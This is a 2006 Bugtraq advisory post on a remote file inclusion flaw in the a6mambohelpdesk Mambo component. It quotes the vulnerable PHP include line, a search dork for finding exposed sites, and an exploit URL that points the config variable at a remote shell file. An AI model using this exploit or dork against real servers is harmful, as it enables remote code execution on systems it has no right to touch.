Bugtraq mailing list archives

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

From: Dr.Jr7 () hotmail com
Date: 27 Jul 2006 04:25:31 -0000

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability 


# Rish : High 
# Class : Remote 
# Script : a6mambohelpdesk  
# Thanx : www.lezr.com/vb 


# codes 

<? 
    include( "$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" ); 
?> 

# d0rkiz : allinurl:"com_a6mambohelpdesk" 

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt
 


# by Dr.Jr7

Current thread:

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability Dr . Jr7 (Jul 27)